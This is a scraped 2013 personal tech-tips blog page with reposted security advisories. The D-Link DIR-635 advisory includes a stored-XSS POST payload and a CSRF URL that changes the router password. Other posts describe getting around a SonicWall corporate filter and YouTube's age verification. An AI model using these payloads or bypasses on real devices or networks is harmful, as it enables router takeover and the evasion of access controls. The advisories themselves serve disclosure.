It's been twice that I had to Google this thing so I'm putting it up on my blog for future reference. :)
Username: {site username}
Password: {obviously...}
Host: c2s.{your domain}.webexconnect.com
(note: if your domain is something like site.com, then include the .com here)
Port: 5222
Tuesday, November 26, 2013
Saturday, May 4, 2013
VUPEN Security Research - Microsoft Internet Explorer 10-9-8-7-6 "CDisplayPointer" Use-after-free (MS13-028)
VUPEN Security Research - Microsoft Internet Explorer 10-9-8-7-6
"CDisplayPointer" Use-after-free (MS13-028)
Website : http://www.vupen.com
Twitter : http://twitter.com/vupen
I. BACKGROUND
---------------------
"Microsoft Internet Explorer is a web browser developed by Microsoft and
included as part of the Microsoft Windows line of operating systems with
more than 60% of the worldwide usage share of web browsers." (Wikipedia)
II. DESCRIPTION
---------------------
VUPEN Vulnerability Research Team discovered a critical vulnerability
in Microsoft Internet Explorer.
The vulnerability is caused by a use-after-free error in the
"CDisplayPointer::
processing "CDisplayPointer" objects, which could be exploited by remote
attackers to compromise a vulnerable system via a malicious web page.
III. AFFECTED PRODUCTS
---------------------------
Microsoft Internet Explorer 10
Microsoft Internet Explorer 9
Microsoft Internet Explorer 8
Microsoft Internet Explorer 7
Microsoft Internet Explorer 6
Microsoft Windows RT
Microsoft Windows 8 for 32-bit Systems
Microsoft Windows 8 for x64-based Systems
Microsoft Windows Server 2012
Microsoft Windows 7 for 32-bit Systems
Microsoft Windows 7 for 32-bit Systems Service Pack 1
Microsoft Windows 7 for x64-based Systems
Microsoft Windows 7 for x64-based Systems Service Pack 1
Microsoft Windows Server 2008 for 32-bit Systems
Microsoft Windows Server 2008 for 32-bit Systems Service Pack 2
Microsoft Windows Server 2008 for x64-based Systems
Microsoft Windows Server 2008 for x64-based Systems Service Pack 2
Microsoft Windows Server 2008 for Itanium-based Systems
Microsoft Windows Server 2008 for Itanium-based Systems Service Pack 2
Microsoft Windows Server 2008 R2 for x64-based Systems
Microsoft Windows Server 2008 R2 for x64-based Systems Service Pack 1
Microsoft Windows Server 2008 R2 for Itanium-based Systems
Microsoft Windows Server 2008 R2 for Itanium-based Systems Service Pack 1
Microsoft Windows Vista Service Pack 1
Microsoft Windows Vista Service Pack 2
Microsoft Windows Vista x64 Edition Service Pack 1
Microsoft Windows Vista x64 Edition Service Pack 2
Microsoft Windows Server 2003 Service Pack 2
Microsoft Windows Server 2003 x64 Edition Service Pack 2
Microsoft Windows Server 2003 with SP2 for Itanium-based Systems
Microsoft Windows XP Service Pack 3
Microsoft Windows XP Professional x64 Edition Service Pack 2
IV. Binary Analysis & Exploits/PoCs
------------------------------
In-depth technical analysis of the vulnerability and a fully functional
remote code execution exploit are available through the VUPEN BAE
(Binary Analysis & Exploits) portal:
http://www.vupen.com/english/
VUPEN Binary Analysis & Exploits Service provides private exploits and
in-depth technical analysis of the most significant public vulnerabilities
based on disassembly, reverse engineering, protocol analysis, and code
audit.
The service allows governments and major corporations to evaluate risks, and
protect infrastructures and assets against new threats. The service also
allows security vendors (IPS, IDS, AntiVirus) to supplement their internal
research efforts and quickly develop both vulnerability-based and
exploit-based signatures to proactively protect their customers from attacks
and emerging threats.
V. VUPEN Threat Protection Program
------------------------------
Governments and major corporations which are members of the VUPEN Threat
Protection Program (TPP) have been proactively alerted about the
vulnerability
when it was discovered by VUPEN in advance of its public disclosure, and
have received a detailed attack detection guidance to protect national and
critical infrastructures against potential 0-day attacks exploiting this
vulnerability:
http://www.vupen.com/english/
VI. SOLUTION
----------------
Apply MS13-028 security updates.
VII. CREDIT
--------------
This vulnerability was discovered by Nicolas Joly of VUPEN Security
VIII. ABOUT VUPEN Security
---------------------------
VUPEN is the leading provider of defensive and offensive cybersecurity
intelligence and advanced vulnerability research. VUPEN solutions enable
corporations and governments to manage risks, and protect critical networks
and infrastructures against known and unknown vulnerabilities.
VUPEN solutions include:
* VUPEN Binary Analysis & Exploits Service (BAE) :
http://www.vupen.com/english/
* VUPEN Threat Protection Program (TPP) :
http://www.vupen.com/english/
IX. REFERENCES
----------------------
http://www.adobe.com/support/
http://www.vupen.com/english/
X. DISCLOSURE TIMELINE
-----------------------------
2012-04-05 - Vulnerability Discovered by VUPEN and shared with VUPEN TPP
customers
2013-04-09 - MS13-028 Released By Microsoft
2013-05-02 - Public disclosure
"CDisplayPointer" Use-after-free (MS13-028)
Website : http://www.vupen.com
Twitter : http://twitter.com/vupen
I. BACKGROUND
---------------------
"Microsoft Internet Explorer is a web browser developed by Microsoft and
included as part of the Microsoft Windows line of operating systems with
more than 60% of the worldwide usage share of web browsers." (Wikipedia)
II. DESCRIPTION
---------------------
VUPEN Vulnerability Research Team discovered a critical vulnerability
in Microsoft Internet Explorer.
The vulnerability is caused by a use-after-free error in the
"CDisplayPointer::
processing "CDisplayPointer" objects, which could be exploited by remote
attackers to compromise a vulnerable system via a malicious web page.
III. AFFECTED PRODUCTS
---------------------------
Microsoft Internet Explorer 10
Microsoft Internet Explorer 9
Microsoft Internet Explorer 8
Microsoft Internet Explorer 7
Microsoft Internet Explorer 6
Microsoft Windows RT
Microsoft Windows 8 for 32-bit Systems
Microsoft Windows 8 for x64-based Systems
Microsoft Windows Server 2012
Microsoft Windows 7 for 32-bit Systems
Microsoft Windows 7 for 32-bit Systems Service Pack 1
Microsoft Windows 7 for x64-based Systems
Microsoft Windows 7 for x64-based Systems Service Pack 1
Microsoft Windows Server 2008 for 32-bit Systems
Microsoft Windows Server 2008 for 32-bit Systems Service Pack 2
Microsoft Windows Server 2008 for x64-based Systems
Microsoft Windows Server 2008 for x64-based Systems Service Pack 2
Microsoft Windows Server 2008 for Itanium-based Systems
Microsoft Windows Server 2008 for Itanium-based Systems Service Pack 2
Microsoft Windows Server 2008 R2 for x64-based Systems
Microsoft Windows Server 2008 R2 for x64-based Systems Service Pack 1
Microsoft Windows Server 2008 R2 for Itanium-based Systems
Microsoft Windows Server 2008 R2 for Itanium-based Systems Service Pack 1
Microsoft Windows Vista Service Pack 1
Microsoft Windows Vista Service Pack 2
Microsoft Windows Vista x64 Edition Service Pack 1
Microsoft Windows Vista x64 Edition Service Pack 2
Microsoft Windows Server 2003 Service Pack 2
Microsoft Windows Server 2003 x64 Edition Service Pack 2
Microsoft Windows Server 2003 with SP2 for Itanium-based Systems
Microsoft Windows XP Service Pack 3
Microsoft Windows XP Professional x64 Edition Service Pack 2
IV. Binary Analysis & Exploits/PoCs
------------------------------
In-depth technical analysis of the vulnerability and a fully functional
remote code execution exploit are available through the VUPEN BAE
(Binary Analysis & Exploits) portal:
http://www.vupen.com/english/
VUPEN Binary Analysis & Exploits Service provides private exploits and
in-depth technical analysis of the most significant public vulnerabilities
based on disassembly, reverse engineering, protocol analysis, and code
audit.
The service allows governments and major corporations to evaluate risks, and
protect infrastructures and assets against new threats. The service also
allows security vendors (IPS, IDS, AntiVirus) to supplement their internal
research efforts and quickly develop both vulnerability-based and
exploit-based signatures to proactively protect their customers from attacks
and emerging threats.
V. VUPEN Threat Protection Program
------------------------------
Governments and major corporations which are members of the VUPEN Threat
Protection Program (TPP) have been proactively alerted about the
vulnerability
when it was discovered by VUPEN in advance of its public disclosure, and
have received a detailed attack detection guidance to protect national and
critical infrastructures against potential 0-day attacks exploiting this
vulnerability:
http://www.vupen.com/english/
VI. SOLUTION
----------------
Apply MS13-028 security updates.
VII. CREDIT
--------------
This vulnerability was discovered by Nicolas Joly of VUPEN Security
VIII. ABOUT VUPEN Security
---------------------------
VUPEN is the leading provider of defensive and offensive cybersecurity
intelligence and advanced vulnerability research. VUPEN solutions enable
corporations and governments to manage risks, and protect critical networks
and infrastructures against known and unknown vulnerabilities.
VUPEN solutions include:
* VUPEN Binary Analysis & Exploits Service (BAE) :
http://www.vupen.com/english/
* VUPEN Threat Protection Program (TPP) :
http://www.vupen.com/english/
IX. REFERENCES
----------------------
http://www.adobe.com/support/
http://www.vupen.com/english/
X. DISCLOSURE TIMELINE
-----------------------------
2012-04-05 - Vulnerability Discovered by VUPEN and shared with VUPEN TPP
customers
2013-04-09 - MS13-028 Released By Microsoft
2013-05-02 - Public disclosure
NGS00415 Patch Notification: Oracle 11g TNS listener remote Null Pointer Dereference (pre-auth)
High Risk Vulnerability in Oracle Database 11g
1 May 2013
Andy Davis of NCC Group has discovered a High risk vulnerability in Oracle Database 11g
Impact: Null Pointer Dereference (Remote DoS)
Versions affected: Oracle Database 11g
Security patch information can be found at the following URL:
http://www.oracle.com/
NCC Group is going to withhold details of this flaw for three months. This three month window will allow users the time needed to apply the patch before the details are released to the general public. This reflects the NCC Group approach to responsible disclosure.
NCC Group Research
http://www.nccgroup.com/
1 May 2013
Andy Davis of NCC Group has discovered a High risk vulnerability in Oracle Database 11g
Impact: Null Pointer Dereference (Remote DoS)
Versions affected: Oracle Database 11g
Security patch information can be found at the following URL:
http://www.oracle.com/
NCC Group is going to withhold details of this flaw for three months. This three month window will allow users the time needed to apply the patch before the details are released to the general public. This reflects the NCC Group approach to responsible disclosure.
NCC Group Research
http://www.nccgroup.com/
Sunday, April 28, 2013
Security Advisory : Multiple Vulnerabilities in D'Link DIR-635
============ Vulnerable Firmware Releases: ============
Firmwareversion: 2.34EU
Hardware-Version: B1
Produktseite: DIR-635
============ Vulnerability Overview: ============
* Stored XSS -> Status - WLAN -> SSID
Injecting scripts into the parameter config.wireless%5B0%5D.ssid_profiles%5B0%5D.ssid reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code.
Place the Code via Setup -> Wireless -> Wireless Network Name
POST /Basic/Wireless.shtml HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.0.1/Basic/Wireless.shtml
Content-Type: application/x-www-form-urlencoded
Content-Length: 2307
config.wireless%5B0%5D.radio_control=1&config.wireless%5B0%5D.ssid_profiles%5B0%5D.wlan_schedule_name=Alw
ays&config.wireless%5B0%5D.ssid_profiles%5B0%5D.ssid=%22%3E%3Cimg+src%3D%220%22+onerror%3Dalert%282
%29%3E&config.wireless%5B0%5D.erp_protection=true&config.wireless%5B0%5D.phy_mode=11&config.wireless%5B0
%5D.auto_channel=true&config.wireless%5B0%5D.channel=6&config.wireless%5B0%5D.tx_rate=0&config.wireless%5B
0%5D.cwm_mode=0&config.wireless%5B0%5D.num_streams=65535&config.wireless%5B0%5D.ssid_profiles%5B0%5D.i
nvisibility=0&wireless_invisibility_radio_0=0&config.wireless%5B0%5D.ssid_profiles%5B0%5D.qos=0&config.wireless
%5B0%5D.ssid_profiles%5B0%5D.wepon=false&config.wireless%5B0%5D.ssid_profiles%5B0%5D.ieee8021x_enabled=fa
lse&config.wireless%5B0%5D.ssid_profiles%5B0%5D.wpa_enabled=true&config.wireless%5B0%5D.ssid_profiles%5B0
%5D.keylen=1&config.wireless%5B0%5D.ssid_profiles%5B0%5D.wep_key_type=0&config.wireless%5B0%5D.ssid_profi
les%5B0%5D.wep_key%5B0%5D=1234567890255123456789
0255&config.wireless%5B0%5D.ssid_profiles%5B0%5D.wep_key%5B1%5D=12345678902551234567890255&config.wirele
ss%5B0%5D.ssid_profiles%5B0%5D.wep_key%5B2%5D=12345678902551234567890255&config.wireless%5B0%5D.ssid_
profiles%5B0%5D.wep_key%5B3%5D=12345678902551234567890255&config.wireless%5B0%5D.ssid_profiles%5B0%5D.
use_key=0&config.wireless%5B0%5D.ssid_profiles%5B0%5D.auth=1&config.wireless%5B0%5D.ssid_profiles%5B0%5D.
wpa_mode=2&config.wireless%5B0%5D.ssid_profiles%5B0%5D.wpa_cipher=3&config.wireless%5B0%5D.ssid_profiles
%5B0%5D.wpa_rekey_time=3600&config.wireless%5B0%5D.ssid_profiles%5B0%5D.wpa_psk=%22%3E%3Cimg+src%3D
%220%22+onerror%3Dalert%281%29%3E&config.wireless%5B0%5D.ssid_profiles%5B0%5D.ieee8021x_reauth_time=60&
config.wireless%5B0%5D.ssid_profiles%5B0%5D.radius_server_address=0.0.0.0&config.wireless%5B0%5D.ssid_profiles
%5B0%5D.radius_server_port=1812&config.wireless%5B0%5D.ssid_profiles%5B0%5D.radius_shared_secret=radius_sha
red&config.wireless%5B0%5D.ssid_profiles%5B0%5D.radius
_auth_mac=true&config.wireless%5B0%5D.ssid_profiles%5B0%5D.
second_radius_server_address=0.0.0.0&config.wireless%5B0%5D.ssid_profiles%5B0%5D.second_radius_server_port=1
812&config.wireless%5B0%5D.ssid_profiles%5B0%5D.second_radius_shared_secret=radius_shared&config.wireless%5
B0%5D.ssid_profiles%5B0%5D.second_radius_auth_mac=true
The code gets executed via Status -> Device Information:
http://Target-IP/Status/Device_Info.shtml
* reflected XSS via Extras -> system Check -> Ping
Injecting scripts into the parameter data reveals that this parameter is not properly validated for malicious input.
* For changing the current password there is no request to the current password
With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.
* CSRF for changing the password without knowing the current one and the attacker is able to activate the remote management:
http://Target-IP/Tools/Admin.shtml?config.password=admin1&config.user_password=&config.gw_name=D-
Link+Systems+DIR-
635&config.web_server_idle_timeout=5&config.graph_auth=false&config.web_server_allow_https=false&config.web_se
rver_allow_wan_http=false&config.web_server_allow_wan_https=false&config.web_server_wan_port_http=8080&confi
g.web_server_wan_port_https=8181&config.wan_web_ingress_filter_name=Allow+All&wan_ingress_filter_details=Allo
w+All
============ Solution ============
No known solution available.
============ Credits ============
The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de
Advisory URL: http://www.s3cur1ty.de/m1adv2013-013
Twitter: @s3cur1ty_de
============ Time Line: ============
November 2012 - discovered vulnerability
11.11.2012 - contacted dlink via the webinterface http://www.dlink.com/us/en/support/contact-support
20.12.2012 - contacted Heise Security with details and Heisec forwarded the details to D-Link
21.12.2012 - D-link responded that they will check the findings
11.01.2013 - requested status update
25.01.2013 - requested status update
25.01.2013 - D-Link responded that this is a security problem from the user and/or browser and they will not provide a fix
25.04.2013 - public release
Replace Eclipse Splash Screen
At work, we are currently using a modified version of the Eclipse IDE, so whenever I open Eclipse I see the company's logo. If you're the type of person who likes to personalize stuff (like me☺) you can change the Eclipse IDE's default splash screen following the directions below:
1. (This step may be necessary in some distros, specially for modified versions of Eclipse, but not really that important if the file used is still the default) Navigate to the Eclipse configuration file normally located in the path below:
{eclipseBaseDirectory}\configuration\config.ini
2. Check the location of the splash image as defined in the configuration file (should look like the one below):
osgi.splashPath=platform\:/base/plugins/org.eclipse.platform
Note: The path above is the default path of the splash image, hence if the version of Eclipse that you are using is not modified, chances are the splash image should be here.
3. Navigate to the path defined in the configuration file and replace the file named "splash.bmp"
4. Restart Eclipse and voila!
1. (This step may be necessary in some distros, specially for modified versions of Eclipse, but not really that important if the file used is still the default) Navigate to the Eclipse configuration file normally located in the path below:
{eclipseBaseDirectory}\configuration\config.ini
2. Check the location of the splash image as defined in the configuration file (should look like the one below):
osgi.splashPath=platform\:/base/plugins/org.eclipse.platform
Note: The path above is the default path of the splash image, hence if the version of Eclipse that you are using is not modified, chances are the splash image should be here.
3. Navigate to the path defined in the configuration file and replace the file named "splash.bmp"
4. Restart Eclipse and voila!
Saturday, April 27, 2013
Friday, April 26, 2013
Saving and Restoring your session's Tabs in Chrome
I'm the kind of person that tends to keep huge numbers of tabs open either for future reading or just 'cause I know I'll be using them later on. With Firefox, this is a mess, 'cause if one of the tabs stop responding you'll have to kill the entire session and relaunch the entire browser. With Chrome and IE though, the system treats each tab as a separate instance of the application. Hence, when one of the tabs become unstable, you can just kill that specific instance and keep the rest alive.
Problem is if it is the PC itself that becomes unresponsive. Well Chrome has something that can deal with this (sort off...).
Problem is if it is the PC itself that becomes unresponsive. Well Chrome has something that can deal with this (sort off...).
Tab Saver is Chrome add on I recently added to my Chrome portable. Available for download here. It saves your tab list on your disk so you can open it later. The add on, by the way, detects the open tabs per window. So if you have tab groups open on multiple Chrome windows, you can save them separately then open them later on for viewing.
Thursday, April 25, 2013
Saturday, April 20, 2013
Bypass SonicWall Internet firewall without using Proxy
Say you want to browse a website but your IT has set a restriction on viewing some websites within your corporate network. You can always use a proxy but this would undermine the security of your browsing (as what proxy servers do is become a "middle-man" for the internet traffic when you use them, sending the data you send to website on your behalf and serving the data returned to you by the website in return). One such example, Sonicwall (and some other web access restriction firewalls) can be easily tricked (if not setup porperly by your IT) by browsing the "secure" version of the website.
Example:
http://www.facebook.com
Example:
http://www.facebook.com
Change the URL to:
https://www.facebook.com
Sunday, April 7, 2013
How to Flush DNS in Different operating Systems
The role of the Domain Name Server is to translate URLs and FQDNs into their corresponding IP Addresses and allow you to route traffic to and from the target machines (whether it be a local network or over the internet). In case of DNS poisoning or just an incorrectly cached address mapping, you can "flush" the DNS to get a new list of name resolution.
To flush DNS cache in Microsoft Windows
- open up command prompt and type in:
ipconfig /flushdns
To flush the DNS cache in Linux, restart the nscd daemon
- issue the following command:
/etc/rc.d/init.d/nscd restart
To flush the DNS cache in Mac OS X Leopard:
- open up terminal and issue the following command:
lookupd -flushcache
To flush the DNS cache in Mac OS X
- open up terminal and issue the following command:
dscacheutil -flushcache
Saturday, April 6, 2013
How to watch flagged Youtube videos without Signing In
You know when you try to watch a Youtube video that requires Login credentials to make sure you are 18+? You can bypass this authentication by working the video's URL.
sample URL (note the video ID):
www.youtube.com/watch?v=SBxjSWEhCVg
To get pass the authentication part, you simply need to modify the URL into something like:
www.youtube.com/watch_popup?v=SBxjSWEhCVg
You can also use the following pattern:
www.youtube.com/v/SBxjSWEhCVg?fs=1
Enjoy!
sample URL (note the video ID):
www.youtube.com/watch?v=SBxjSWEhCVg
To get pass the authentication part, you simply need to modify the URL into something like:
www.youtube.com/watch_popup?v=SBxjSWEhCVg
You can also use the following pattern:
www.youtube.com/v/SBxjSWEhCVg?fs=1
Enjoy!
Thursday, January 3, 2013
Subscribe to:
Posts (Atom)